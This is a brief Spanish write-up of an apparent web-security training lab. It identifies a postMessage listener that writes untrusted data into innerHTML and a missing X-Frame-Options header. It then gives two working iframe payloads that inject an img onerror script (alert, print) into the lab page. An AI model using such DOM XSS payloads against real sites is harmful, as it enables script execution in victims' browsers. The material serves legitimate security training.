Primero analizamos el codigo fuente y se detecta un codigo javascript interesante:
<!-- Ads to be inserted here -->
<div id='ads'></div>
<script>
window.addEventListener('message', function(e) {
document.getElementById('ads').innerHTML = e.data;
})
</script>
Teniendo en cuenta lo anterior y adicionalmente la ausencia de la cabecera de x-frame-options:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 11084
<iframe src="https://0a6f00e203d49a2b80f7121800fe00bb.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(2024)>','*')">
<iframe src="https://0a6f00e203d49a2b80f7121800fe00bb.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">